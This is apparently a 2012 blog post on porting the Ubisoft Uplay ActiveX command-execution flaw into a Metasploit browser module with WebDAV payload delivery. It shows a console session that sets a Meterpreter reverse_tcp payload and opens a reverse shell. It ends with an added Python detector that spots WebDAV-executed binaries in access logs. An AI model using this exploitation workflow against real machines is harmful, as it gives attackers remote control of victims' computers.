Tuesday 31 July 2012

Ubisoft Browser Plugin Exploit

As an exercise in developing for Metasploit, a couple of colleagues and I attempted to port the recent Ubisoft ActiveX Plugin Command Execution Exploit (versions <= 2.03) disclosed by Tavis Ormandy: http://seclists.org/fulldisclosure/2012/Jul/375

It's a very simple exploit: the plugin just takes the path to an exe and loads it for you, so there is no memory corruption to worry about. Our initial attempt would just run any local executable, and while we were developing this Ubisoft pushed out a very swift patch to close the flaw.

It's still possible to use the old 2.03 installer, disconnect from the internet to prevent the update process, log in, and set Uplay to offline mode to prevent further updates. This also means there might be a few souls out there still running vulnerable versions, but they will be few and far between.

It did not work on Windows 7 but happily did on Windows XP. Not sure why this is, but never mind. Tested it in IE; it should theoretically work in other browsers, but they generally did not have the plugin registered.

Further feedback from Rapid7's Sinn3r suggested using WebDAV to deliver the payload rather than limiting it to local files, so I butchered webdav_dll_hijacker.rb to serve exes. I had a few problems in that, after requesting the exe, the client would then try to request xxx.exe.Manifest and DLLs, corrupting the executable, but with a helpful hint from HDM to answer those requests with a 404 response it was off and running:
 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 917 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

msf > use exploit/windows/browser/ubisoft_uplay_cmd_exec
msf  exploit(ubisoft_uplay_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ubisoft_uplay_cmd_exec) > set LHOST 192.168.1.45
LHOST => 192.168.1.45
msf  exploit(ubisoft_uplay_cmd_exec) > exploit
[*] Exploit running as background job.
msf  exploit(ubisoft_uplay_cmd_exec) >
[*] Started reverse handler on 192.168.1.45:4444
[*] Exploit URI: http://192.168.1.45:80/kcomPoOs
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.45:80/
[*] Server started.
[*] 192.168.1.45     ubisoft_uplay_cmd_exec - GET => Exploit
[*] 192.168.1.45     ubisoft_uplay_cmd_exec - GET => Payload
[*] Sending stage (752128 bytes) to 192.168.1.45
[*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.45:3762) at 2012-07-31 20:45:15 +0100

Hopefully it will be included in the main trunk, but it's unlikely to get any real-world shells given Ubisoft's swift turnaround! https://github.com/rapid7/metasploit-framework/pull/653
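The xxx.exe.Manifest requests mentioned above are also a useful artefact for the defensive side: the Windows loader only asks for a manifest once it maps an executable, so a WebDAV client fetching an .exe and then its .Manifest in the same session is a strong sign the binary was run straight off the share. The script below is an added example (not part of the original post or the Metasploit module) that applies that logic to web-server access logs; the log lines are constructed, and it assumes the Windows WebClient identifies itself with the "Microsoft-WebDAV-MiniRedir" user-agent.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [31/Jul/2012:20:45:01 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.7 - - [31/Jul/2012:20:45:01 +0100] "PROPFIND /share HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.7 - - [31/Jul/2012:20:45:02 +0100] "GET /share/update.exe HTTP/1.1" 200 73802 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.7 - - [31/Jul/2012:20:45:02 +0100] "GET /share/update.exe.Manifest HTTP/1.1" 404 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
10.0.0.9 - - [31/Jul/2012:20:46:10 +0100] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [31/Jul/2012:20:46:11 +0100] "GET /tools/setup.exe HTTP/1.1" 200 88000 "-" "Mozilla/5.0"
"""

# ip, method, path, status and user-agent are all we need from each line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def parse(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webdav_exe_loads(log_text):
    """Return {client_ip: [exe paths]} for clients that fetched an .exe through
    the Windows WebDAV redirector and then requested <exe>.Manifest, which is
    what the loader does when it maps the file, i.e. the exe was executed."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        r = parse(line)
        # Only the WebClient redirector matters here; browser downloads are ignored.
        if r and r["ua"].startswith("Microsoft-WebDAV-MiniRedir"):
            per_client[r["ip"]].append(r)
    hits = {}
    for ip, reqs in per_client.items():
        exes = {r["path"] for r in reqs
                if r["method"] == "GET" and r["path"].lower().endswith(".exe")}
        # Strip the 9-character ".Manifest" suffix to recover the exe path it belongs to.
        manifests = {r["path"][:-len(".Manifest")] for r in reqs
                     if r["path"].lower().endswith(".exe.manifest")}
        loaded = sorted(exes & manifests)
        if loaded:
            hits[ip] = loaded
    return hits

if __name__ == "__main__":
    for ip, paths in find_webdav_exe_loads(SAMPLE_LOG).items():
        print(f"{ip} executed from WebDAV share: {', '.join(paths)}")
```

The browser download on 10.0.0.9 is deliberately not flagged: a plain GET of an .exe is routine, it is the redirector plus manifest pair that marks execution from the share.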
